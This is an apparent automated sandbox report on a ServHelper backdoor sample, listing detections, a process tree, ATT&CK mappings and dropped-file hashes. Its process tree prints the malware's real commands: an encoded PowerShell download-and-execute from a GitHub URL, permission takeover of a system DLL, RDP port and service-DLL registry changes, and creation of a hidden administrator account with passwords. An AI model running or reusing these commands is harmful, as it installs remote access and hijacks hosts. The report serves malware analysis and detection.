Analysis

  • max time kernel
    126s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    03-06-2021 16:37

General

  • Target

    aa80d5960e65ac46ad446c09c1a17608.exe

  • Size

    6.0MB

  • MD5

    aa80d5960e65ac46ad446c09c1a17608

  • SHA1

    c2468b1792e5ecef461d2d89470e8438c05cce24

  • SHA256

    857ddc8de567afa19f5bc9236f6cf3681e46919530f90acc25ff36112564432c

  • SHA512

    07e15d76dc1940e0b3a926cfa6a5d92760525ae7f9e54bc8c691f1c9ea8af71ffe818aa347857a5c1435316d152a262a1875f03f465bc7be36a10e73bab6022b

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 21 IoCs
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\aa80d5960e65ac46ad446c09c1a17608.exe
    "C:\Users\Admin\AppData\Local\Temp\aa80d5960e65ac46ad446c09c1a17608.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2008
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1744
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5kisgcpo\5kisgcpo.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1828
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA5D.tmp" "c:\Users\Admin\AppData\Local\Temp\5kisgcpo\CSC62A9160FDF734FD5B8D7EC570E781E5.TMP"
          4⤵
            PID:1204
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1096
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1732
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1084
        • C:\Windows\system32\takeown.exe
          "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1204
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:572
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:1972
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:292
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1520
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1068
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1776
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1700
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:1600
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:508
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:1696
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1364
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:2040
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1760
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:548
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                      PID:1980
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start rdpdr
                        6⤵
                          PID:1924
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                    3⤵
                      PID:584
                      • C:\Windows\system32\cmd.exe
                        cmd /c net start TermService
                        4⤵
                          PID:1772
                          • C:\Windows\system32\net.exe
                            net start TermService
                            5⤵
                              PID:880
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 start TermService
                                6⤵
                                  PID:1336
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                            3⤵
                              PID:1772
                            • C:\Windows\system32\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                              3⤵
                                PID:1224
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe user wgautilacc Ghar4f5 /del
                            1⤵
                              PID:1088
                              • C:\Windows\system32\net.exe
                                net.exe user wgautilacc Ghar4f5 /del
                                2⤵
                                  PID:292
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
                                    3⤵
                                      PID:1604
                                • C:\Windows\System32\cmd.exe
                                  cmd /C net.exe user wgautilacc ydmkirZK /add
                                  1⤵
                                    PID:1868
                                    • C:\Windows\system32\net.exe
                                      net.exe user wgautilacc ydmkirZK /add
                                      2⤵
                                        PID:1776
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 user wgautilacc ydmkirZK /add
                                          3⤵
                                            PID:1864
                                      • C:\Windows\System32\cmd.exe
                                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                        1⤵
                                          PID:508
                                          • C:\Windows\system32\net.exe
                                            net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                            2⤵
                                              PID:1692
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                                3⤵
                                                  PID:980
                                            • C:\Windows\System32\cmd.exe
                                              cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
                                              1⤵
                                                PID:1608
                                                • C:\Windows\system32\net.exe
                                                  net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
                                                  2⤵
                                                    PID:1760
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
                                                      3⤵
                                                        PID:1872
                                                  • C:\Windows\System32\cmd.exe
                                                    cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                                    1⤵
                                                      PID:1932
                                                      • C:\Windows\system32\net.exe
                                                        net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                                        2⤵
                                                          PID:756
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
                                                            3⤵
                                                              PID:1088
                                                        • C:\Windows\System32\cmd.exe
                                                          cmd /C net.exe user wgautilacc ydmkirZK
                                                          1⤵
                                                            PID:1536
                                                            • C:\Windows\system32\net.exe
                                                              net.exe user wgautilacc ydmkirZK
                                                              2⤵
                                                                PID:1788
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 user wgautilacc ydmkirZK
                                                                  3⤵
                                                                    PID:1868
                                                              • C:\Windows\System32\cmd.exe
                                                                cmd.exe /C wmic path win32_VideoController get name
                                                                1⤵
                                                                  PID:1364
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic path win32_VideoController get name
                                                                    2⤵
                                                                    • Modifies data under HKEY_USERS
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:980
                                                                • C:\Windows\System32\cmd.exe
                                                                  cmd.exe /C wmic CPU get NAME
                                                                  1⤵
                                                                    PID:548
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic CPU get NAME
                                                                      2⤵
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1520
                                                                  • C:\Windows\System32\cmd.exe
                                                                    cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                    1⤵
                                                                      PID:844
                                                                      • C:\Windows\system32\cmd.exe
                                                                        cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                        2⤵
                                                                          PID:1864
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                            3⤵
                                                                            • Blocklisted process makes network request
                                                                            • Drops file in Windows directory
                                                                            • Modifies data under HKEY_USERS
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1740
                                                                      • C:\Windows\System32\cmd.exe
                                                                        cmd.exe /C net user wgautilacc 1234
                                                                        1⤵
                                                                          PID:756
                                                                          • C:\Windows\system32\net.exe
                                                                            net user wgautilacc 1234
                                                                            2⤵
                                                                              PID:1604
                                                                              • C:\Windows\system32\net1.exe
                                                                                C:\Windows\system32\net1 user wgautilacc 1234
                                                                                3⤵
                                                                                  PID:1520

                                                                            Network

                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                            Persistence

                                                                            Account Manipulation

                                                                            1
                                                                            T1098

                                                                            Registry Run Keys / Startup Folder

                                                                            1
                                                                            T1060

                                                                            Defense Evasion

                                                                            Modify Registry

                                                                            2
                                                                            T1112

                                                                            File Permissions Modification

                                                                            1
                                                                            T1222

                                                                            Lateral Movement

                                                                            Remote Desktop Protocol

                                                                            1
                                                                            T1076

                                                                            Replay Monitor

                                                                            Loading Replay Monitor...

                                                                            Downloads

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_19c29f81-2f37-48e8-badb-9169608082ff
                                                                              MD5

                                                                              a70ee38af4bb2b5ed3eeb7cbd1a12fa3

                                                                              SHA1

                                                                              81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

                                                                              SHA256

                                                                              dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

                                                                              SHA512

                                                                              8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6e304f41-8e5c-4bf1-b26d-d7fde46d360f
                                                                              MD5

                                                                              7f79b990cb5ed648f9e583fe35527aa7

                                                                              SHA1

                                                                              71b177b48c8bd745ef02c2affad79ca222da7c33

                                                                              SHA256

                                                                              080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

                                                                              SHA512

                                                                              20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_715da140-e2da-4d1f-b36e-45bd3108716f
                                                                              MD5

                                                                              e5b3ba61c3cf07deda462c9b27eb4166

                                                                              SHA1

                                                                              b324dad73048be6e27467315f82b7a5c1438a1f9

                                                                              SHA256

                                                                              b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

                                                                              SHA512

                                                                              a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7f1841ab-4336-4cd2-9954-325aaf09d00e
                                                                              MD5

                                                                              6f0d509e28be1af95ba237d4f43adab4

                                                                              SHA1

                                                                              c665febe79e435843553bee86a6cea731ce6c5e4

                                                                              SHA256

                                                                              f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

                                                                              SHA512

                                                                              8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8515c37e-0b70-4d21-adf4-cb6f04ac6fa4
                                                                              MD5

                                                                              faa37917b36371249ac9fcf93317bf97

                                                                              SHA1

                                                                              a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

                                                                              SHA256

                                                                              b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

                                                                              SHA512

                                                                              614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c2a90320-db7c-4748-aa14-e7ece2f23a3d
                                                                              MD5

                                                                              2d5cd190b5db0620cd62e3cd6ba1dcd3

                                                                              SHA1

                                                                              ff4f229f4fbacccdf11d98c04ba756bda80aac7a

                                                                              SHA256

                                                                              ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

                                                                              SHA512

                                                                              edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_edf9fa20-c5cd-4a28-83c3-f7da6ae2b836
                                                                              MD5

                                                                              d89968acfbd0cd60b51df04860d99896

                                                                              SHA1

                                                                              b3c29916ccb81ce98f95bbf3aa8a73de16298b29

                                                                              SHA256

                                                                              1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

                                                                              SHA512

                                                                              b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                              MD5

                                                                              5a73fa95ac5e73faae35c8640d778132

                                                                              SHA1

                                                                              3bb80f4e5d769715c364ac3ee2bae085afe082ba

                                                                              SHA256

                                                                              31d8a0fc6955e602c45154d85adcac0759e13c415d922e17ef1bb01ef96eccac

                                                                              SHA512

                                                                              9cc51e4b836856c7442d8539d502fd4e7a52b413e0bb76aff718d99741c410f001fec329bbff2537c7cbf053bcb87e1ce76e4d3d89382514e8ffdb20481b81a5

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                              MD5

                                                                              b491a1965dda7b85a2f0d49e88aaadd5

                                                                              SHA1

                                                                              cb608d977bb900fc002721cfaa315dd9950fcaff

                                                                              SHA256

                                                                              bba0a6ba4f6bdd66c7e24bca365958e5d5a0c3d0d9ac3216b053352d7dae4fb0

                                                                              SHA512

                                                                              946932b62a58d711ca460d425f88a9d541a4600c2a059a8557aa1cb06266410549eb5bbb64df8283c845aaad678865df4995ddfa47ca739344c5661f29b5f12d

                                                                            • C:\Users\Admin\AppData\Local\Temp\5kisgcpo\5kisgcpo.dll
                                                                              MD5

                                                                              1b38c153ce43cc4c0c19d1f98faf9525

                                                                              SHA1

                                                                              530d5c55a01fb11c496af0f2e4229b9608bbf31c

                                                                              SHA256

                                                                              13e14482c2cea3799ba19e9165505235786c7d3f63b52d8d2e77f450b86dbf15

                                                                              SHA512

                                                                              01dc41ec372e044c809fdc975c91ec53454cfc13a43e73966abdfcf4b6d18a32be1fe59ec62fd96ccb0714572873e739d45a4dcda55a7651091960325ab25770

                                                                            • C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1
                                                                              MD5

                                                                              b2207567c6a62b42655772770ce2a4e6

                                                                              SHA1

                                                                              51074ad655105f0c496f4017e8afee90d9cab900

                                                                              SHA256

                                                                              d7b206f39b6f6996cb9472df9fa350ab9da7f1eca47f782c4e5d05ca338daaab

                                                                              SHA512

                                                                              85d8eb5772d672b1e84b3f09048c207ed7ecaa7f68f14dc34baa34dd49ed0d674ff150eec20932e468a7a4d17d91d22caa639fe8d9bab0bed0105c4c38631bb5

                                                                            • C:\Users\Admin\AppData\Local\Temp\RESA5D.tmp
                                                                              MD5

                                                                              11bb5dc3800468e3794eb2d6d3d5656d

                                                                              SHA1

                                                                              8fc5d1f1fa9647dce108dd662bd4b495279b2fb9

                                                                              SHA256

                                                                              093738ac65b0c897c4302464240260791784509ec07e6c26eb12dc9e1352b0f5

                                                                              SHA512

                                                                              c3cc723b2c0b0ed0948b0e2da40ef212ebf832f02b10b4a9db5d4f109749651ad52f2249ed5f6e770dff02ba77e66796496895197c03b08ba9bfcf84513225d0

                                                                            • C:\Users\Admin\AppData\Local\Temp\ready.ps1
                                                                              MD5

                                                                              065cc96fec70546c9f195f703e4d657b

                                                                              SHA1

                                                                              9da24636d8fd3de61f46ff7282640d3fa27d6b45

                                                                              SHA256

                                                                              cc7097fa515dfc07033464b5e71ba0172f440bd4043ec1c7c48c6ce4f18e3bc3

                                                                              SHA512

                                                                              a2fefe055067d832736c109d1ea50921bfc9275bb6fe11e57f4245cac52e1758b9b2d7fe893ece0fe5101b3cb5a1229011b8e517fe31de5202c4a7f0fa39aec0

                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                              MD5

                                                                              41718a8143f8f3f12e5afeb94dec0794

                                                                              SHA1

                                                                              852d09ac2b909608c7c916bf572f11f80036fa63

                                                                              SHA256

                                                                              89defcb6787bf3cd67a0e6d50551c4279fc8d96568892f865bbc2a7af9538abc

                                                                              SHA512

                                                                              2eebc547e35d1b79c7624c12d7a26315e356b6b3d137216f50c4cf81d2917bb8f9a904ce9197addb84db8e9045a52fec6a8134d1242a641d15e27569b0653fd3

                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                              MD5

                                                                              41718a8143f8f3f12e5afeb94dec0794

                                                                              SHA1

                                                                              852d09ac2b909608c7c916bf572f11f80036fa63

                                                                              SHA256

                                                                              89defcb6787bf3cd67a0e6d50551c4279fc8d96568892f865bbc2a7af9538abc

                                                                              SHA512

                                                                              2eebc547e35d1b79c7624c12d7a26315e356b6b3d137216f50c4cf81d2917bb8f9a904ce9197addb84db8e9045a52fec6a8134d1242a641d15e27569b0653fd3

                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                              MD5

                                                                              41718a8143f8f3f12e5afeb94dec0794

                                                                              SHA1

                                                                              852d09ac2b909608c7c916bf572f11f80036fa63

                                                                              SHA256

                                                                              89defcb6787bf3cd67a0e6d50551c4279fc8d96568892f865bbc2a7af9538abc

                                                                              SHA512

                                                                              2eebc547e35d1b79c7624c12d7a26315e356b6b3d137216f50c4cf81d2917bb8f9a904ce9197addb84db8e9045a52fec6a8134d1242a641d15e27569b0653fd3

                                                                            • C:\Windows\system32\rfxvmt.dll
                                                                              MD5

                                                                              dc39d23e4c0e681fad7a3e1342a2843c

                                                                              SHA1

                                                                              58fd7d50c2dca464a128f5e0435d6f0515e62073

                                                                              SHA256

                                                                              6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                                                                              SHA512

                                                                              5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\5kisgcpo\5kisgcpo.0.cs
                                                                              MD5

                                                                              df390bc8a088b51d27253fed32186361

                                                                              SHA1

                                                                              69e6a59300fc04ef5ab53cbe061b8b2aefe375a4

                                                                              SHA256

                                                                              4388b3b4aaccededcd9a2d864ba85967c08a4586dee2745e5539e12cb4de5c5f

                                                                              SHA512

                                                                              4d0d050afd8809b9090e0ac8ab4f00ad4237723bfa8adb2f605fbbdd6be532bd941bccf79b7fbc0d226bc7890c2011dd18b0263af5b81911e1c8def2d9f235c8

                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\5kisgcpo\5kisgcpo.cmdline
                                                                              MD5

                                                                              9a16a6f26f52e9dcc62a5b0a7c86734a

                                                                              SHA1

                                                                              dd6d07a20107f16907c130db14d18663430744ee

                                                                              SHA256

                                                                              730a26ac23abb94e7041888ffdf6e3c1c0770e56aacd33b117f01d1861fbac45

                                                                              SHA512

                                                                              7251f9d8b98c4b640d4260e70bd60c5a33d80739a2882cbc0d25c7decc515331742e39a6b9b90e0230deb3d583bd0c375b069a678f9d1ea5336aabeb533806c6

                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\5kisgcpo\CSC62A9160FDF734FD5B8D7EC570E781E5.TMP
                                                                              MD5

                                                                              a9230735a40fc4a6d921ffe31823ad03

                                                                              SHA1

                                                                              be411be027e7eaced81a82d393ab562ae2dfd420

                                                                              SHA256

                                                                              baa6f104a1e8185c4632aea2f64f977aa4c94e38f6a119d960e50551080219b8

                                                                              SHA512

                                                                              df3a7b97da2de02eb0bdbdf6658304e2235787d194093f68e387b3dd505b4ad7a123bf686fcff62dc25cdcff4b9d5c9f35d3428a962b73d3c7996d81076c1b59

                                                                            • \Windows\Branding\mediasrv.png
                                                                              MD5

                                                                              1da8e368cb917044f7440a54d79f6737

                                                                              SHA1

                                                                              df60dd7011bc948f3b871b1a6cb149a7028c1a85

                                                                              SHA256

                                                                              dce86185269e01eba9301b761ae9a002054713060e35dbc908d44ddd8e647bd4

                                                                              SHA512

                                                                              8437463516b7da13a661d5acdadd8d52641464e797831e635d697aa863c2c01b3f15be67073d08f2d9361f639b4ee1eaf9a0c8b2811f3cd3d78c43e55651fa92

                                                                            • \Windows\Branding\mediasvc.png
                                                                              MD5

                                                                              009e8b6a916836a4a8aa2be3229276a1

                                                                              SHA1

                                                                              28f3892fb8b63e7299dce25cb65bf252e29d5afd

                                                                              SHA256

                                                                              39ec650a006fc423825d552edf526443c96b5a027f58e6423e6344d90b228ab7

                                                                              SHA512

                                                                              a47a29ce28659d2839d808a614d9537fdcefcc08509f5e0cab0c747ebb7f04453781647e475934b4db5e254127e8621cedab01efd425fb5af23cac8dfcf9d7dc

                                                                            • memory/292-181-0x0000000000000000-mapping.dmp
                                                                            • memory/292-161-0x0000000000000000-mapping.dmp
                                                                            • memory/508-167-0x0000000000000000-mapping.dmp
                                                                            • memory/548-172-0x0000000000000000-mapping.dmp
                                                                            • memory/572-159-0x0000000000000000-mapping.dmp
                                                                            • memory/584-175-0x0000000000000000-mapping.dmp
                                                                            • memory/756-189-0x0000000000000000-mapping.dmp
                                                                            • memory/880-177-0x0000000000000000-mapping.dmp
                                                                            • memory/980-186-0x0000000000000000-mapping.dmp
                                                                            • memory/980-193-0x0000000000000000-mapping.dmp
                                                                            • memory/1068-163-0x0000000000000000-mapping.dmp
                                                                            • memory/1084-142-0x0000000000000000-mapping.dmp
                                                                            • memory/1084-155-0x0000000002574000-0x0000000002576000-memory.dmp
                                                                              Filesize

                                                                              8KB

                                                                            • memory/1084-154-0x0000000002570000-0x0000000002572000-memory.dmp
                                                                              Filesize

                                                                              8KB

                                                                            • memory/1088-190-0x0000000000000000-mapping.dmp
                                                                            • memory/1096-87-0x0000000000000000-mapping.dmp
                                                                            • memory/1096-100-0x0000000001F20000-0x0000000001F21000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1096-119-0x000000001BBB0000-0x000000001BBB1000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1096-120-0x000000001BBC0000-0x000000001BBC1000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1096-106-0x000000001B9E0000-0x000000001B9E1000-memory.dmp
                                                                              Filesize

                                                                              4KB

                                                                            • memory/1096-93-0x000000001A9E4000-0x000000001A9E6000-memory.dmp
                                                                              Filesize

                                                                              8KB

                                                                            • memory/1096-92-0x000000001A9E0000-0x000000001A9E2000-memory.dmp
                                                                              Filesize

                                                                              8KB

                                                                            • memory/1096-95-0x0000000002730000-0x0000000002731000-memory.dmp
                                                                              Filesize

                                                                              4KB

